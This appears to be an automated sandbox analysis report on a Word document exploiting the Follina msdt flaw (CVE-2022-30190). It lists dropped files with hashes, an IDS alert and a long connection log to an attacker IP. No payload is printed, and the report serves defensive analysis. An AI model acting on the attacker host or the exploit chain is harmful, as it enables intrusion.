                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):162
                                                                                                                                                                      Entropy (8bit):2.183415143652617
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Rl/Zde8FxlqKT2k3ll//olF883nl1Z:RtZWI2kVWF
                                                                                                                                                                      MD5:F7D5777AA9278B2A2C2AE07E96521B27
                                                                                                                                                                      SHA1:AAF2BC43AA48170626C2808D24E763C51F5F53F8
                                                                                                                                                                      SHA-256:E60F7AAEAED18B9A530A2D3333F621D427C071EE7DB6C2670BC131583E9CCEA0
                                                                                                                                                                      SHA-512:E27638644E0E69ADB7D4D13DF3AF49641C995B22AC69F2B614B0CBF5A29CA81C1560FAFA2E4C4062155F36E20DD9E5EFFACAF277A56FEA86F1A05DE23CF6A332
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:.pratesh................................................p.r.a.t.e.s.h..............&..........H.......6C...........'...............................(..............
                                                                                                                                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):24702
                                                                                                                                                                      Entropy (8bit):4.37978533849437
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:fO3MDP8m2xaqade1tXv8v/XPSwTkal+7lOaNeHdXQZvczyJuz4UnPz0Kuz+NGTEP:O5NzuCWNaEcU8mjapMVOHW
                                                                                                                                                                      MD5:191959B4C3F91BE170B30BF5D1BC2965
                                                                                                                                                                      SHA1:1891E3CB588516B94FDC53794DA4DF5469A4C6D0
                                                                                                                                                                      SHA-256:8EC3A8F67BAF1E4658FC772F9F35230CA1B0318DDAF7A4C84789A329B6F7F047
                                                                                                                                                                      SHA-512:092CC417FBFE7F6E02A60FF169209D7B60362B585CBF92521BFC71C0B378D978DFB9265A3E48C630CE6ABAB263711D71F3917FFAF51B6FD449CFC394E9D8C3A9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:<dcmPS:DiagnosticPackage SchemaVersion="1.0" Localized="true" xmlns:dcmPS="http://www.microsoft.com/schemas/dcm/package/2007" xmlns:dcmRS="http://www.microsoft.com/schemas/dcm/resource/2007">.. <DiagnosticIdentification>.. <ID>PCW</ID>.. <Version>3.0</Version>.. </DiagnosticIdentification>.. <DisplayInformation>.. <Parameters/>.. <Name>@diagpackage.dll,-1</Name>.. <Description>@diagpackage.dll,-2</Description>.. </DisplayInformation>.. <PrivacyLink>https://go.microsoft.com/fwlink/?LinkId=534597</PrivacyLink>.. <PowerShellVersion>2.0</PowerShellVersion>.. <SupportedOSVersion clientSupported="true" serverSupported="true">6.1</SupportedOSVersion>.. <Troubleshooter>.. <Script>.. <Parameters/>.. <ProcessArchitecture>Any</ProcessArchitecture>.. <RequiresElevation>false</RequiresElevation>.. <RequiresInteractivity>true</RequiresInteractivity>.. <FileName>TS_ProgramCompatibilityWizard.ps1</FileName>.. <ExtensionPoint/>.. </Script>..
                                                                                                                                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):66560
                                                                                                                                                                      Entropy (8bit):6.926109943059805
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:ytBGLADXf3iFGQ+/ReBQBJJgUKZgyxMBGb:ytBGcDXvKoRqKuxgyx
                                                                                                                                                                      MD5:6E492FFAD7267DC380363269072DC63F
                                                                                                                                                                      SHA1:3281F69F93D181ADEE35BC9AD93B8E1F1BBF7ED3
                                                                                                                                                                      SHA-256:456AE5D9C48A1909EE8093E5B2FAD5952987D17A0B79AAE4FFF29EB684F938A8
                                                                                                                                                                      SHA-512:422E2A7B83250276B648510EA075645E0E297EF418564DDA3E8565882DBBCCB8C42976FDA9FCDA07A25F0F04A142E43ECB06437A7A14B5D5D994348526123E4E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                      File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):50242
                                                                                                                                                                      Entropy (8bit):4.932919499511673
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:/wugEs5GhrQzYjGBHvPbD9FZahXuDzsP6qqF8DdEakDiqeXacgcRjdhGPtQMHQF4:/c5AMHvDDf2VE+quAiMw4
                                                                                                                                                                      MD5:EDF1259CD24332F49B86454BA6F01EAB
                                                                                                                                                                      SHA1:7F5AA05727B89955B692014C2000ED516F65D81E
                                                                                                                                                                      SHA-256:AB41C00808ADAD9CB3D76405A9E0AEE99FB6E654A8BF38DF5ABD0D161716DC27
                                                                                                                                                                      SHA-512:A6762849FEDD98F274CA32EB14EC918FDBE278A332FDA170ED6D63D4C86161F2208612EB180105F238893A2D2B107228A3E7B12E75E55FDE96609C69C896EBA0
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#This is passed from the troubleshooter via 'Add-DiagRootCause'..PARAM($targetPath, $appName)....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008..#rfink - 01 Sept 2008 - rewrite to support dynamic choices....#set-psdebug -strict -trace 0....#change HKLM\Software\Windows NT\CurrentVersion\AppCompatFlags\CompatTS EnableTracing(DWORD) to 1..#if you want to enable tracing..$SpewTraceToDesktop = $false....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....#Compatibility modes..$CompatibilityModes = new-Object System.Collections.Hashtable..$CompatibilityModes.Add("Version_WIN8RTM", "WIN8RTM")..$CompatibilityModes.Add("Version_WIN7RTM", "WIN7RTM")..$CompatibilityModes.Add("Version_WINVISTA2", "VISTASP2")..$CompatibilityModes.Add("Version_WINXP3", "WINXPSP3")..$CompatibilityModes.Add("Version_MSIAUTO", "MSIAUTO")..$CompatibilityModes.Add("Version_UNKNOWN", "WINXPSP3")..$Comp
                                                                                                                                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                      File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):16946
                                                                                                                                                                      Entropy (8bit):4.860026903688885
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:3FptgXhu9IOM7BTDLwU7GHf7FajKFzB9Ww:Ghu9I9dQYWB9Ww
                                                                                                                                                                      MD5:2C245DE268793272C235165679BF2A22
                                                                                                                                                                      SHA1:5F31F80468F992B84E491C9AC752F7AC286E3175
                                                                                                                                                                      SHA-256:4A6E9F400C72ABC5B00D8B67EA36C06E3BC43BA9468FE748AEBD704947BA66A0
                                                                                                                                                                      SHA-512:AAECB935C9B4C27021977F211441FF76C71BA9740035EC439E9477AE707109CA5247EA776E2E65159DCC500B0B4324F3733E1DFB05CEF10A39BB11776F74F03C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#TS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....$ShortcutListing = New-Object System.Collections.Hashtable..$ExeListing = New-Object System.Collections.ArrayList..$CombinedListing = New-Object System.Collections.ArrayList....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....# Block PCW on unsupported SKUs..$BlockedSKUs = @(178)..[Int32]$OSSKU = (Get-WmiObject -Class "Win32_OperatingSystem").OperatingSystemSKU..if ($BlockedSKUs.Contains($OSSKU))..{.. return..}....$typeDefinition = @"....using System;..using System.IO;..using System.Runtime.InteropServices;..using System.Text;..using System.Collections;....public class Utility..{.. public static string GetStartMenuPath().. {.. return Environment.GetFolderPath(Environment.SpecialFolder.StartMenu);.. }.... public static string GetAllUsersStartMenuPath().. {.. return Path.Combine(Environ
                                                                                                                                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                      File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):453
                                                                                                                                                                      Entropy (8bit):4.983419443697541
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:QcM3BFN+dxmVdyKVCkLZI4S2xhzoJNIDER5lI02xzS4svc3uVr:Qb3DQbeCklTxhzoJUoS02tCr
                                                                                                                                                                      MD5:60A20CE28D05E3F9703899DF58F17C07
                                                                                                                                                                      SHA1:98630ABC4B46C3F9BD6AF6F1D0736F2B82551CA9
                                                                                                                                                                      SHA-256:B71BC60C5707337F4D4B42BA2B3D7BCD2BA46399D361E948B9C2E8BC15636DA2
                                                                                                                                                                      SHA-512:2B2331B2DD28FB0BBF95DC8C6CA7E40AA56D4416C269E8F1765F14585A6B5722C689BCEBA9699DFD7D97903EF56A7A535E88EAE01DFCC493CEABB69856FFF9AA
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#if this environment variable is set, we say that we don't detect the problem anymore so it will..#show as fixed in the final screen..PARAM($appName)....$detected = $true..if ($Env:AppFixed -eq $true)..{.. $detected = $false ..}....Update-DiagRootCause -id "RC_IncompatibleApplication" -iid $appName -Detected $detected....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....
                                                                                                                                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6650
                                                                                                                                                                      Entropy (8bit):3.6751460885012333
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:q39pB3hpieJGhn8n/y7+aqwcQoXQZWx+cWUcYpy7I6D1RUh5EEjQB5dm:q39pRhp6Sy6wZifVEtjjFm
                                                                                                                                                                      MD5:E877AD0545EB0ABA64ED80B576BB67F6
                                                                                                                                                                      SHA1:4D200348AD4CA28B5EFED544D38F4EC35BFB1204
                                                                                                                                                                      SHA-256:8CAC8E1DA28E288BF9DB07B2A5BDE294122C8D2A95EA460C757AE5BAA2A05F27
                                                                                                                                                                      SHA-512:6055EC9A2306D9AA2F522495F736FBF4C3EB4078AD1F56A6224FF42EF525C54FF645337D2525C27F3192332FF56DDD5657C1384846678B343B2BFA68BD478A70
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
Preview:# Localized.04/11/2018 02:05 PM (GMT).303:4.80.0411 .CL_LocalizationData.psd1..# Localized.01/04/2013 11:32 AM (GMT).303:4.80.0411 .CL_LocalizationData.psd1..ConvertFrom-StringData @'..###PSLOC..Program_Choice_NOTLISTED=Not Listed..Version_Choice_DEFAULT=None..Version_Choice_WIN8RTM=Windows 8..Version_Choice_WIN7RTM=Windows 7..Version_Choice_WINVISTA2=Windows Vista (Service Pack 2)..Version_Choice_WINXPSP3=Windows XP (Service Pack 3)..Version_Choice_MSIAUTO=Skip Version Check..Version_Choice_UN
                                                                                                                                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):10752
                                                                                                                                                                      Entropy (8bit):3.517898352371806
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:Gmw56QoV8m7t/C7eGu7tCuKFtrHQcoC1dIO4Pktmg5CuxbEWgdv0WwF:WAQovu548tmirAWu8Wm
                                                                                                                                                                      MD5:CC3C335D4BBA3D39E46A555473DBF0B8
                                                                                                                                                                      SHA1:92ADCDF1210D0115DB93D6385CFD109301DEAA96
                                                                                                                                                                      SHA-256:330A1D9ADF3C0D651BDD4C0B272BF2C7F33A5AF012DEEE8D389855D557C4D5FD
                                                                                                                                                                      SHA-512:49CBF166122D13EEEA2BF2E5F557AA8696B859AEA7F79162463982BBF43499D98821C3C2664807EDED0A250D9176955FB5B1B39A79CDF9C793431020B682ED12
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):48956
                                                                                                                                                                      Entropy (8bit):5.103589775370961
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:768:hUeTHmb0+tk+Ci10ycNV6OW9a+KDoVxrVF+bBH0t9mYNJ7u2+d:hUcHXDY10tNV6OW9abDoVxrVF+bBH0tO
                                                                                                                                                                      MD5:310E1DA2344BA6CA96666FB639840EA9
                                                                                                                                                                      SHA1:E8694EDF9EE68782AA1DE05470B884CC1A0E1DED
                                                                                                                                                                      SHA-256:67401342192BABC27E62D4C1E0940409CC3F2BD28F77399E71D245EAE8D3F63C
                                                                                                                                                                      SHA-512:62AB361FFEA1F0B6FF1CC76C74B8E20C2499D72F3EB0C010D47DBA7E6D723F9948DBA3397EA26241A1A995CFFCE2A68CD0AAA1BB8D917DD8F4C8F3729FA6D244
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:<?xml version="1.0"?>..<?Copyright (c) Microsoft Corporation. All rights reserved.?>..<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:ms="urn:microsoft-performance" exclude-result-prefixes="msxsl" version="1.0">...<xsl:output method="html" indent="yes" standalone="yes" encoding="UTF-16"/>...<xsl:template name="localization">....<_locDefinition>.....<_locDefault _loc="locNone"/>.....<_locTag _loc="locData">String</_locTag>.....<_locTag _loc="locData">Font</_locTag>.....<_locTag _loc="locData">Mirror</_locTag>....</_locDefinition>...</xsl:template>... ********** Images ********** -->...<xsl:variable name="images">....<Image id="check">res://sdiageng.dll/check.png</Image>....<Image id="error">res://sdiageng.dll/error.png</Image>....<Image id="info">res://sdiageng.dll/info.png</Image>....<Image id="warning">res://sdiageng.dll/warning.png</Image>....<Image id="expand">res://sdiageng.dll/expand.png</Image>....<Image id="
                                                                                                                                                                      File type:Microsoft OOXML
                                                                                                                                                                      Entropy (8bit):7.869060797789825
                                                                                                                                                                      TrID:
                                                                                                                                                                      • Word Microsoft Office Open XML Format document (49504/1) 49.01%
                                                                                                                                                                      • Word Microsoft Office Open XML Format document (43504/1) 43.07%
                                                                                                                                                                      • ZIP compressed archive (8000/1) 7.92%
                                                                                                                                                                      File name:doc782.docx
                                                                                                                                                                      File size:10144
                                                                                                                                                                      MD5:e7015438268464cedad98b1544d643ad
                                                                                                                                                                      SHA1:03ef0e06d678a07f0413d95f0deb8968190e4f6b
                                                                                                                                                                      SHA256:d20120cc046cef3c3f0292c6cbc406fcf2a714aa8e048c9188f1184e4bb16c93
                                                                                                                                                                      SHA512:d134d87c28acb758b897a287a9f6ce86776f384f43ee963f52b40e173b6bfcd9dc76e5f64b9a40b93d3bf2a5b988f842c27c90611a8b4408abd9e197191e4aad
                                                                                                                                                                      SSDEEP:192:s5VReDWRPj8Iugw1Blb8VPkf+CFk4v1Y2VveFLC9FJ9Q7dlpN2:snPj8I10lD9+2Vvx9qlpN2
                                                                                                                                                                      TLSH:A3228E3ADA5508B5CAD2A275E0AC0B2AD30C42BBB73BE9CB65C653E402C85DB0F5530C
                                                                                                                                                                      Icon Hash:74fcd0d2d6d6d0cc
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
06/07/22-18:38:14.250872 | TCP | 2036726 | ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190) | 80 | 49173 | 185.234.247.119 | 192.168.2.22
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                      Jun 7, 2022 18:44:08.052884102 CEST4975880192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:44:08.227951050 CEST4975280192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:44:08.256129026 CEST8049752185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:44:08.296071053 CEST4975280192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:44:08.324341059 CEST8049752185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:44:08.363728046 CEST4975880192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:44:08.391499996 CEST8049758185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:44:08.391665936 CEST4975880192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:44:08.398813963 CEST4975280192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:44:08.493047953 CEST4975880192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:44:08.520741940 CEST8049758185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:44:08.520881891 CEST4975880192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:44:09.212635040 CEST4975880192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:44:09.240037918 CEST8049758185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:44:09.240113020 CEST4975880192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:44:14.023246050 CEST4975880192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:44:14.050962925 CEST8049758185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:44:14.051094055 CEST4975880192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.365149975 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.392676115 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.393069029 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.398526907 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.426112890 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.563088894 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.563114882 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.563146114 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.563169003 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.563191891 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.563210011 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.563225031 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.563241005 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.563244104 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.563258886 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.563316107 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.563348055 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.590662003 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.590702057 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.590728998 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.590776920 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.590789080 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.590801954 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.590826988 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.590842962 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.590852022 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.590876102 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.590899944 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.590907097 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.590926886 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.590953112 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.590965986 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.590977907 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.591001987 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.591006994 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.591027021 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.591048956 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.591049910 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.591073036 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.591093063 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.591094017 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.591146946 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.596038103 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.596076012 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.596190929 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.618658066 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.618705988 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.618731976 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.618761063 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.618786097 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.618809938 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.618828058 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.618835926 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.618861914 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.618880987 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.618886948 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.618911982 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.618932009 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.618937016 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.618959904 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.618964911 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.618993044 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.619009972 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.619019032 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.619045973 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.619070053 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.619071960 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.619096041 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.619106054 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.619122028 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.619148016 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.619167089 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.619174004 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.619200945 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.619225025 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.619225979 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.619251966 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.619272947 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.619277954 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.619323969 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.619349003 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.619375944 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.619414091 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.619755983 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.619807959 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.619832039 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.619859934 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.619870901 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.619884014 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.619909048 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.619932890 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.619965076 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.619995117 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.623558044 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.623594046 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.623620033 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.623642921 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.623647928 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.623678923 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.629533052 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.629687071 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.703799963 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.703818083 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.703820944 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.703830957 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.703845024 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.703860998 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.703876972 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.703881025 CEST8049781185.234.247.119192.168.2.4
